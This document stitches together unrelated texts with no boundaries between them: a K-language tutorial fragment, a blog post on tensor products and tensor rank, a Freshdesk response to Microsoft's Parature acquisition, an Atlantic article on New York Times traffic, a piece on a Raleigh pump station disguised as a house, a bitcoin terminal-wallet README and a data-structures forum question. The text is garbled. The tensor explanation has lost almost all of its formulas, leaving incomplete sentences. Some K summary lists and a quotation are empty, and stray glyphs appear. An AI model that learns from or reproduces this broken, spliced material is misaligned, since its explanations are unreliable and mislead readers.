 +/m plus OVER items of m, i.e. 2 3 4 + 5 6 7.
7 9 11
 +/'m plus OVER EACH item of m, i.e. (+/2 3 4;+/5 6 7).
9 18
 +\v plus SCAN items of v, i.e. (3;3+4).
3 7

+ and * are binary atomic functions. / \ and ’ are operators. Operators, which are spelled in capitals in the commentary, take functions as arguments and derive related functions as results. E.g. + is plus and +/ is sum. In general,

 f/ x     applies f successively OVER the items of x.
 f\ x     applies f successively SCANning the items 
     of x from beginning to end.
 f' x     applies f to EACH of the items of x in
     parallel.

Also,

 v+'v     v plus EACH v, i.e. (3+3;4+4).
6 8
 v<\v     v less-than EACHLEFT v, i.e. (3<3 4;4<3 4).
0 1
0 0
 v</v     v less-than EACHRIGHT v, (3 4<3;3 4<4).
0 0
1 0

The binary cases of the functions derived from / \ and ’ are all parallel operations. In general,

 x f' y     applies f to EACH of the items of x and y ⍲ 
     pairwise.
 x f\ y     applies f to EACH of the items on the 
     LEFT(x) while keeping y fixed.
 x f/ y     applies f to EACH of the items on the 
     RIGHT(y) while keeping x fixed.

A function f is atomic if and only if f is equivalent to f’. For example,

 (v+v) ~ v+'v     v plus v is-equivalent-to v plus EACH v.

Note,

 v*m     v times m, i.e. (3*2 3 4;4*5 6 7).
 6 9 12
 20 24 28
 +/v*m     plus OVER v times m, i.e. 6 9 12+ 20 24 28.
26 33 40

Composition arises from the juxtaposition of functions. For example,

 ~=     not equal.
 ~<     not less than, i.e. more than or equal.
 ~>     not more than, i.e. less than or equal.
 +/*     plus OVER times ⍲ generalized dot 
     product.
 (+/*)\     (plus OVER times) EACHLEFT ⍲ matrix 
     product.

In general, for functions f and g:

((f g)x) ~ f g x     (f compose g) of x is equivalent to f of g of x.
(x(f g)y) ~ f x g y     x(f compose g)y is equivalent to f of x g y.
((x f)y) ~ x f y     (x with f)of y is equivalent to x f y.

For example, from linear algebra we know that:

s*     is a linear transform from R to R.
m(+/*)\     is a linear transform from R2 to R3.

Of course these lists do not have to be rectangular nor of uniform type. Therefore lists are a simple yet powerful extension to the rectangular homogeneous arrays of the original APL. There is no need for enclose or disclose. Moreover, the parallel operators / \ and ’ simplify and generalize, and thus obviate, inner and outer products as well as the bracket-axis operator.

Another important generalization is making expressions first-class data objects and allowing them any number of arguments. The application of an expression to its arguments is done with brackets. For example, the fundamental calculation in finance is present value, i.e. price.

Given a list of cashflows c that come at corresponding times t with a prevailing discount rate d, then ...

 pv:{[c;t;d]+/c*d^t} pv gets: sum of cashflow times d to the power t.

The discount rate is the reciprocal of 1 plus the interest rate, for example, a discount rate of 0.9 corresponds to approximately 11%, and means that 1 dollar one year from now is worth 90 cents today.

For example, a 3-year bond issued with an annual 10% coupon would have:

 c: 0.1 0.1 1.1     cashflow is coupon, coupon and 
     principal+coupon
 t: 1 2 3     at years 1 2 and 3.

Then,

 pv[c;t;0.9]     present value of the bond at 0.9 annual discount
0.9729     is approximately 97 cents.

This formula is well-known and widely used. Unfortunately it is also inexact. It assumes a constant interest rate over the life of the bond. The right way to make this calculation is to use the current prices of all relevant financial instruments to derive a discount function d[t] (read d of t). d[t] is the present value of a dollar at all times t. So now the formula is:

 pv:{[c;t;d]+/c*d[t]}     pv gets: sum of cashflow times discounts at 
     times t.
 pv[c;t;{[t] 0.9^t}]     call pv with c, t and lambda-expression for d.
0.9729

Instead of storing a function as an expression we could store the actual mapping itself. This can be much more efficient, e.g. in this case,

 d: 1 0.9 0.81 0.729     d gets discount for years 0,1,2 and 3.
 pv[c;t;d]     ... and once again ...
0.9729

Note the pv definition didn’t change. Function call and indexing use the same notation, i.e. if the left argument is a list then index – if it is an atomic lambda-expression then execute. This is a powerful idea. A list v is often a very effective representation of a function from 0 1 2 ... to v[0] v[1] v[2] ... . For example,

 v:1 2 3 4 5     define a list v, i.e. the range of v.
 !#v     enumerate count v, i.e. the domain of v.
0 1 2 3 4
 v[3]     v at 3
4
 f:{[x]1+x}     define a functional superset of v.
 f[3]     f at 3
4

It is possible to fix some arguments to a function just as it is possible to specify just some axes in indexing. In the following example m and f both implement + – m1 and f1 both implement 1+.

 m:n+\n:!4     m gets n plus EACHLEFT n gets enumerate 4, 
     i.e. m is defined to be the 4 by 4 addition table.
 m
0 1 2 3
1 2 3 4
2 3 4 5
3 4 5 6

f:{[x;y]x+y}     f is defined to be addition.
 m[1;2]     m at 1 2
3
 f[1;2]     f at 1 2
3
 m1:m[1]     m1 gets m at row 1.
 m1
1 2 3 4
 f1:f[1]     f1 gets f with x fixed at 1.
 m1[2]     m1 at 2
3
 f1[2]     f1 at 2
3

The [ and ] are for convenience. The underlying primitive is @.

Summary

K stands for “keys to the kingdom”.

The keys to expressiveness include:

The keys to performance include:

In summary, what is K? It is a powerful programming language. Why use K? For productivity and performance. What is new, different and exciting?

Conclusion

K can run on any architecture but runs especially well on high-bandwidth RISC and parallel RISC. This is because of its emphasis on arrays and parallel operations on the arrays. The natural tendency in K to write parallel solutions to problems helps make K an ideal language for distributed and parallel processing.

A professor at Stanford once said,

He was explaining some aspects of multidimensional Fourier transforms, but this comment is only half in jest; people get confused by tensor products. It’s often for good reason. People who really understand tensors feel obligated to explain it using abstract language (specifically, universal properties). And the people who explain it in elementary terms don’t really understand tensors.

This post is an attempt to bridge the gap between the elementary and advanced understandings of tensors. We’ll start with the elementary (axiomatic) approach, just to get a good feel for the objects we’re working with and their essential properties. Then we’ll transition to the “universal” mode of thought, with the express purpose of enlightening us as to why the properties are both necessary and natural.

But above all, we intend to be sufficiently friendly so as to not make anybody run in fear. This means lots of examples and preferring words over symbols. Unfortunately, we simply can’t get by without the reader knowing the very basics of linear algebra (the content of our first two primers on linear algebra (1)(2), though the only important part of the second is the definition of an inner product).

So let’s begin.

Tensors as a Bunch of Axioms

The easiest way to think about tensors is as a set with some additional properties. Now this author happens to believe that the purely axiomatic approach to mathematics is quite boring, but it is certainly straightforward in hindsight.

One way to can construct tensor products as sets is by taking a product of two vector spaces , and then using a mathematical machete to completely disfigure it. You should keep in mind as we continue, but for the sake of generality we’ll talk about two arbitrary finite-dimensional vector spaces of dimensions . Then the product space is just the vector space of pairs where comes from and from . Recall that addition in this vector space is defined componentwise ()) and scalar multiplication scales both components .

Now to get the tensor product space , we make the following modifications. First, we redefine what it means to do scalar multiplication. In this brave new tensor world, scalar multiplication of the whole vector-pair is declared to be the same as scalar multiplication of any component you want. In symbols,

for all choices of scalars and vectors . Second, we change the addition operation so that it only works if one of the two components are the same. In symbols, we declare that

only works because is the same in both pieces, and with the same rule applying if we switch the positions of above. All other additions are simply declared to be new vectors. I.e. is simply itself. It’s a valid addition — we need to be able to add stuff to be a vector space — but you just can’t combine it any further unless you can use the scalar multiplication to factor out some things so that or . To say it still one more time, a general element of the tensor is a sum of these pairs that can or can’t be combined by addition (in general things can’t always be combined).

Finally, we rename the pair to , to distinguish it from the old vector space that we’ve totally butchered and reanimated, and we call the tensor product space as a whole . Those familiar with this kind of abstract algebra will recognize quotient spaces at work here, but we won’t use that language except to note that we cover quotients and free spaces elsewhere on this blog, and that’s the formality we’re ignoring.

As an example, say we’re taking the tensor product of two copies of . This means that our space is comprised of vectors like , and moreover that the following operations are completely legitimate.

Cool. This seemingly innocuous change clearly has huge implications on the structure of the space. We’ll get to specifics about how different tensors are from regular products later in this post, but for now we haven’t even proved this thing is a vector space. It might not be obvious, but if you go and do the formalities and write the thing as a quotient of a free vector space (as we mentioned we wouldn’t do) then you know that quotients of vector spaces are again vector spaces. So we get that one for free. But even without that it should be pretty obvious: we’re essentially just declaring that all the axioms of a vector space hold when we want them to. So if you were wondering whether

The answer is yes, by force of will.

So just to recall, the axioms of a tensor space are

Naturally, one can extend this definition to -fold tensor products, like . Here we write the vectors as sums of things like , and we enforce that addition can only be combined if all but one coordinates are the same in the addends, and scalar multiples move around to all coordinates equally freely.

So where does it come from?!

By now we have this definition and we can play with tensors, but any sane mathematically minded person would protest, “What the hell would cause anyone to come up with such a definition? I thought mathematics was supposed to be elegant!”

It’s an understandable position, but let me now try to convince you that tensor products are very natural. The main intrinsic motivation for the rest of this section will be this:

We have all these interesting mathematical objects, but over the years we have discovered that the maps between objects are the truly interesting things.

A fair warning: although we’ll maintain a gradual pace and informal language in what follows, by the end of this section you’ll be reading more or less mature 20th-century mathematics. It’s quite alright to stop with the elementary understanding (and skip to the last section for some cool notes about computing), but we trust that the intrepid readers will push on.

So with that understanding we turn to multilinear maps. Of course, the first substantive thing we study in linear algebra is the notion of a linear map between vector spaces. That is, a map that factors through addition and scalar multiplication (i.e. and ).

But it turns out that lots of maps we work with have much stronger properties worth studying. For example, if we think of matrix multiplication as an operation, call it , then takes in two matrices and spits out their product

Now what would be an appropriate notion of linearity for this map? Certainly it is linear in the first coordinate, because if we fix then

And for the same reason it’s linear in the second coordinate. But it is most definitely not linear in both coordinates simultaneously. In other words,

In fact, if the only operation satisfying linearity in its two coordinates separately and also this kind of linearity is the zero map! (Try to prove this as an exercise.) So the strongest kind of linearity we could reasonably impose is that is linear in each coordinate when all else is fixed. Note that this property allows us to shift around scalar multiples, too. For example,

Starting to see the wispy strands of a connection to tensors? Good, but hold it in for a bit longer. This single-coordinate-wise-linear property is called bilinearity when we only have two coordinates, and multilinearity when we have more.

Here are some examples of nice multilinear maps that show up everywhere:

There are many other examples, but you should have at least passing familiarity with these notions, and it’s enough to convince us that multilinearity is worth studying abstractly.

And so what tensors do is give a sort of classification of multilinear maps. The idea is that every multilinear map from a product vector space to any vector space can be written first as a multilinear map to the tensor space

Followed by a linear map to ,

And the important part is that doesn’t depend on the original (but does). One usually draws this as a single diagram:

And to say this diagram commutes is to say that all possible ways to get from one point to another are equivalent (the compositions of the corresponding maps you follow are equal, i.e. ).

In fuzzy words, the tensor product is like the gatekeeper of all multilinear maps, and is the gate. Yet another way to say this is that is the most general possible multilinear map that can be constructed from . Moreover, the tensor product itself is uniquely defined by having a “most-general” (up to isomorphism). This notion is often referred to by mathematicians as the “universal property” of the tensor product. And they might say something like “the tensor product is initial with respect to multilinear mappings from the standard product.” We discuss language like this in detail in this blog’s series on category theory, but it’s essentially a super-compact (and almost too vague) way of saying what the diagram says.

Let’s explore this definition when we specialize to a tensor of two vector spaces, and it will give us a good understanding of (which is really incredibly simple, but people like to muck it up with choices of coordinates and summations). So fix as vector spaces and look at the diagram

What is in this case? Well it just sends . Is this map multilinear? Well if we fix then

and

And our familiarity with tensors now tells us that the other side holds too. Actually, rather than say this is a result of our “familiarity with tensors,” the truth is that this is how we know that we need to define the properties of tensors as we did. It’s all because we designed tensors to be the gatekeepers of multilinear maps!

So now let’s prove that all maps can be decomposed into an part and a part. To do this we need to know what data uniquely defines a multilinear map. For usual linear maps, all we had to do was define the effect of the map on each element of a basis (the rest was uniquely determined by the linearity property). We know what a basis of is, it’s just the union of the bases of the pieces. Say that has a basis and has , then a basis for the product is just .

But multilinear maps are more nuanced, because they have two arguments. In order to say “what they do on a basis” we really need to know how they act on all possible pairs of basis elements. For how else could we determine ? If there are of the ‘s and of the ‘s, then there are such pairs .

Uncoincidentally, as is a vector space, its basis can also be constructed in terms of the bases of and . You simply take all possible tensors . Since every can be written in terms of their bases, it’s clear than any tensor can also be written in terms of the basis tensors (by simply expanding each in terms of their respective bases, and getting a larger sum of more basic tensors).

Just to drive this point home, if is a basis for , and a basis for , then the tensor space has basis

It’s a theorem that finite-dimensional vector spaces of equal dimension are isomorphic, so the length of this basis (6) tells us that .

So fine, back to decomposing . All we have left to do is use the data given by (the effect on pairs of basis elements) to define . The definition is rather straightforward, as we have already made the suggestive move of showing that the basis for the tensor space () and the definition of () are essentially the same.

That is, just take . Note that this is just defined on the basis elements, and so we extend to all other vectors in the tensor space by imposing linearity (defining to split across sums of tensors as needed). Is this well defined? Well, multilinearity of forces it to be so. For if we had two equal tensors, say, , then we know that has to respect their equality, because , so will take the same value on equal tensors regardless of which representative we pick (where we decide to put the ). The same idea works for sums, so everything checks out, and is equal to , as desired. Moreover, we didn’t make any choices in constructing . If you retrace our steps in the argument, you’ll see that everything was essentially decided for us once we fixed a choice of a basis (by our wise decisions in defining ). Since the construction would be isomorphic if we changed the basis, our choice of is unique.

There is a lot more to say about tensors, and indeed there are some other useful ways to think about tensors that we’ve completely ignored. But this discussion should make it clear why we define tensors the way we do. Hopefully it eliminates most of the mystery in tensors, although there is still a lot of mystery in trying to compute stuff using tensors. So we’ll wrap up this post with a short discussion about that.

Computability and Stuff

It should be clear by now that plain product spaces and tensor product spaces are extremely different. In fact, they’re only related in that their underlying sets of vectors are built from pairs of vectors in and . Avid readers of this blog will also know that operations involving matrices (like row reduction, eigenvalue computations, etc.) are generally efficient, or at least they run in polynomial time so they’re not crazy impractically slow for modest inputs.

On the other hand, it turns out that almost every question you might want to ask about tensors is difficult to answer computationally. As with the definition of the tensor product, this is no mere coincidence. There is something deep going on with tensors, and it has serious implications regarding quantum computing. More on that in a future post, but for now let’s just focus on one hard problem to answer for tensors.

As you know, the most general way to write an element of a tensor space is as a sum of the basic-looking tensors.

where the may be sums of vectors from themselves. But as we saw with our examples over , there can be lots of different ways to write a tensor. If you’re lucky, you can write the entire tensor as a one-term sum, that is just a tensor . If you can do this we call the tensor a pure tensor, or a rank 1 tensor. We then have the following natural definition and problem:

Definition: The rank of a tensor is the minimum number of terms in any representation of as a sum of pure tensors. The one exception is the zero element, which has rank zero by convention.

Problem: Given a tensor where is a field, compute its rank.

Of course this isn’t possible in standard computing models unless you can represent the elements of the field (and hence the elements of the vector space in question) in a computer program. So we restrict to be either the rational numbers or a finite field .

Even though the problem is simple to state, it was proved in 1990 (a result of Johan Håstad) that tensor rank is hard to compute. Specifically, the theorem is that

Theorem: Computing tensor rank is NP-hard when and NP-complete when is a finite field.

The details are given in Håstad’s paper, but the important work that followed essentially showed that most problems involving tensors are hard to compute (many of them by reduction from computing rank). This is unfortunate, but also displays the power of tensors. In fact, tensors are so powerful that many believe understanding them better will lead to insight in some very important problems, like finding faster matrix multiplication algorithms or proving circuit lower bounds (which is closely related to P vs NP). Finding low-rank tensor approximations is also a key technique in a lot of recent machine learning and data mining algorithms.

With this in mind, the enterprising reader will probably agree that understanding tensors is both valuable and useful. In the future of this blog we’ll hope to see some of these techniques, but at the very least we’ll see the return of tensors when we delve into quantum computing.

Until next time!

In a recent post, Forbes columnist Gene Marks predicted that Microsoft just put Freshdesk and a few other companies out of business by acquiring Parature and announcing that it will be integrated into the Dynamics CRM platform.

As a fellow entrepreneur, I’m happy for the founders of Parature and their team. I would like to congratulate them on the successful exit.  I would also like to thank Gene for calling out Freshdesk as the company that Microsoft  just put out of business. Come on, who doesn’t enjoy getting killed by Microsoft? The fact that we are on this list means that we have come a long way from being Bizspark winners in 2011, and that have earned his respect (to be considered as competition to Microsoft). I am really proud of that. However, the world has changed a lot, and Gene’s prediction may not come true. Here are a few points to consider:

1. When was the last time Microsoft put anybody out of business? I think the days of Microsoft putting companies out of business ended when the Windows monopoly ended. People remember the Internet Explorer vs Netscape story but that was 15 years before Google, Facebook, Twitter or smartphones had entered the picture. More than half of our employees hadn’t completed 5th grade by then.

The Zune was supposed to be the iPod killer. The Windows Phone is supposed to be iPhone and Android killer. The Surface is supposed to be an iPad killer. And Bing is supposed to be the Google killer. We understand that we’re not Apple or Google, but with all due respect to Microsoft, it’s a much different world now than it was in 1998.

2. Salesforce acquired Assistly in 2011 and people were predicting that it was supposed to be the end of Freshdesk. Too bad we grew to 15,000 customers and continue to win more and more customers away from Desk.com (formerly Assistly) even after Salesforce dropped the product prices and abolished add-on pricing. Just how many times are we supposed to die?

3. Customers are not stupid – In today’s world, customers understand that they have options and they know how to find them. We are definitely not underestimating Microsoft’s financial muscle and global reach. But what Gene and others are missing is the fact that Dynamics CRM has had ticketing functionality for several years now (and they didn’t put any of us out of business.)

Initial reports seem to indicate that the acquisition was primarily for the Knowledge Base capability to be integrated into Dynamics CRM which already has ticket management features. So, it is fairly reasonable to expect that Microsoft will be asking Parature customers to switch to Dynamics CRM’s ticketing functionality once the KBase integration is over.

The Microsoft acquisition, if anything, gives Parature founders a safe landing. For Parature customers who feel abandoned while they wait another year or two for the completion of integration into Dynamics CRM – we have some good news. Freshdesk is pleased to extend a “Parachute to the Future” offer to enable them to land safely in the land of Happy Customers!

Please email us at parachute@freshdesk.com and we will help you import your data and move to Freshdesk!

The New York Times has released its list of most-visited stories of 2013. As The Atlantic’s business editor Derek Thompson noted, they include four breaking news articles, one of which was a map; three health stories; a long narrative about poverty in New York; and two celebrity op-eds.

What interests me most about the list, though, is what's at the number one spot: A news interactive made by Josh Katz and Wilson Andrews called “How Y’all, Youse, and You Guys Talk.” It was one of many stories that news organizations published about dialect this year—The Atlantic made a video!—all inspired by a North Carolina State University dialect quiz, but it was, for the Times, the most-visited thing.

Think about that. A news app, a piece of software about the news made by in-house developers, generated more clicks than any article. And it did this in a tiny amount of time: The app only came out on December 21, 2013. That means that in the 11 days it was online in 2013, it generated more visits than any other piece.

I’ll repeat: It took a news app only 11 days to “beat” every other story the Times published in 2013. It’s staggering.

I can’t help but compare “How Y’all” to “The Scientific 7-Minute Workout,” a straight health article that was the paper’s sixth most-popular article. Other developers wound up converting the article into an HTML or iOS app you can use on your phone; I now use those apps everyday and the ad revenue created by them doesn’t go to the Times.

It’s hard not to conclude that not turning the article into an app was a missed opportunity for the Gray Lady. 

Below, I’ve converted the Times’s list into links:

This article available online at:

http://www.theatlantic.com/technology/archive/2014/01/-em-the-new-york-times-em-most-popular-story-of-2013-was-not-an-article/283167/

If you live or work in Raleigh, there's a reasonable chance you've driven by it. Maybe hundreds, or even thousands of times. And, chances are, you've never noticed anything out of the ordinary. In most ways, it's wholly unremarkable.

The house at 3215 Wade Avenue, about 15 minutes from downtown Raleigh, looks just like the rest of the houses in that neighborhood. A nice metal roof. Forest green window shutters. Doric columns line the front porch.

But there's no driveway out front. And the lights are never on. And there's no walkway to the front door.

Of course, none of those amenities are necessary, because this house is not a house at all:

(Don't read anymore if you haven't watched the video and want to be surprised.)

OK, here's the secret:

The ordinary-looking house on Wade Ave actually disguises a pump station for the city of Raleigh public utilities.

A pump station is basically a supercharger - Water comes in, the station speeds it up, and pushes the water uphill. Without these things, the city's water would run backwards. It would never get to your sink.

The city has about 20 different pump stations, but Wade Avenue's is the only one that looks like a house.

Why Keep It Hidden?

In the late 70s, the city decided, for various reasons, this would be the best site for the pump station. Unfortunately, pump stations are notoriously loud and ugly. There's a church in the neighborhood, and the city actually held a meeting to hear from the congregation.

Mostly out of courtesy, the city decided to help the station blend in. The house looks just like all the other houses in the neighborhood in terms of architectural style. And to deal with the noise problem, they used sound dampening materials in the construction. So while the walls of your house might be made of wood and plaster, these are made of cinder block.

Not Just Raleigh

Turns out, these things are lurking all over the place. They're in Florida, and Virginia, New York, California, Wisconsin. While no definitive list exists, it wouldn't be unreasonable to bet there's one of these "houses" or something like it in every state in the country. Some of them hide pump stations. Others hide electrical generators and the like.

Perry Allen, the city employee who walked me through the house, says that this pump station never has any problems with vandalism, unlike other pump stations that are in more remote areas, undisguised. "They tend to interest people more," he told me, which is crazy because the house on Wade Avenue is clearly the most interesting.

But, just to be clear, the house is monitored remotely, and access is strictly limited to those who know who to call to get in. So don't plan on going house (or pump station) hunting this weekend.

(h/t to the Reddit feed that first pointed this out to us)

Update Saturday 10:00 a.m.: We posted this video on Thursday afternoon. In 36 hours, close to 200,000 people have viewed it.

Many of you told us that you had no idea about the history of the house on Wade Ave.

Chris writes: "I remember when they were building [the house on Wade Ave] because my brothers and sisters and I used to wonder what was hidden inside. We could tell it wasn't a real house. Our guesses were much wilder than just a pump station."

Lots of you shared your own stories with us on social media. Here are some from Facebook:

Vickie: My sister once lived in new rural subdivision that was big enough to need its own fire station. They took the biggest model house and modified the garage with bigger doors. And that was the fire station until a real one was built nearby a few years later. They removed the enormous garage doors, fixed the walls, and sold it as a normal house--you cant even tell now.

Joan: I need to figure out how to share this with the city of Newark! Much nicer to look at than the huge metal blocks and pipes we get to see in our neighborhoods.

Myra: Here in the Bronx there is an entire block (Bruckner Blvd/138) that looks like an apt complex to cover huge generators for ConEd and going towards Westchester Cty a cell tower that looks like a tree.

Patricia: We have a cell phone tower in our city that looks like a tree. ATT is planning for another one by a preschool. The school and the neighbors around are trying to fight it going in. Although the property owner, a Church, wants it for the $$$ of course.

The story is getting reaction at the NPR blog, The Two-Way. Here is an interesting comment from SarahKatherine:

Producer Eric Mennel talks about The House On Wade Avenue with WUNC Host, Catherine Brand.

termcoin

A bitcoin wallet for your terminal.

termcoin is written in node.js, using blessed, and uses bitcoind (and optionally other cryptocurrency rpc servers) as its backend.

Screenshots

Usage

termcoin by default tries to connect to the bitcoin rpc server in~/.bitcoin/bitcoin.conf, but it can also be specified directly:

$ termcoin http://bitcoinrpc:foobar@localhost:8332/

To use for other cryptocurrencies:

Advantages

• Runs in a terminal. Possible to use over ssh. Easier than using bitcoind directly.
• Uses bitcoind as a backend, which means it is also possible to use with litecoin/namecoin/dogecoin/etc.

Shortcomings

The bitcoin rpc server is limited in what it could do. Ideally I wanted this to have all the capabilities of a full wallet, but that would require, for example, linking to to berkeley db to parse the wallet.dat. I wanted to write this entirely in node.

External Dependencies

• bitcoind - json-rpc server
• qrencode - for QR codes rendered in your terminal.
• xsel/xclip - clipboard support for X11.
• pbcopy - clipboard support for OSX.

Donations

• BTC: 14UwZi7hY2gQKUvA1Poz7vyxK9SzwAJ6CR
• LTC: Lg2FyTZn1YRGMUAbL5xYhmjiCZvWM6f2Z1
• DOGE: DAwtjssd9y3HQp5vTXqZhsdshxkDzDXoRT
• COYE: 5Vqi6WYbK6fixQ4A1ypiJZXJtJkMBnAfpu

Contribution and License Agreement

If you contribute code to this project, you are implicitly allowing your code to be distributed under the MIT license. You are also implicitly verifying that all code is your original work. </legalese>

License

Copyright (c) 2014, Christopher Jeffrey. (MIT License)

See LICENSE for more info.

There are some data structures around that are really useful but are unknown to most programmers. Which ones are they?

Everybody knows about linked lists, binary trees, and hashes, but what about Skip lists and Bloom filters for example. I would like to know more data structures that are not so common, but are worth knowing because they rely on great ideas and enrich a programmer's tool box.

PS: I am also interested in techniques like Dancing links which make clever use of properties of a common data structure.

EDIT: Please try to include links to pages describing the data structures in more detail. Also, try to add a couple of words on why a data structure is cool (as Jonas Kölker already pointed out). Also, try to provide one data-structure per answer. This will allow the better data structures to float to the top based on their votes alone.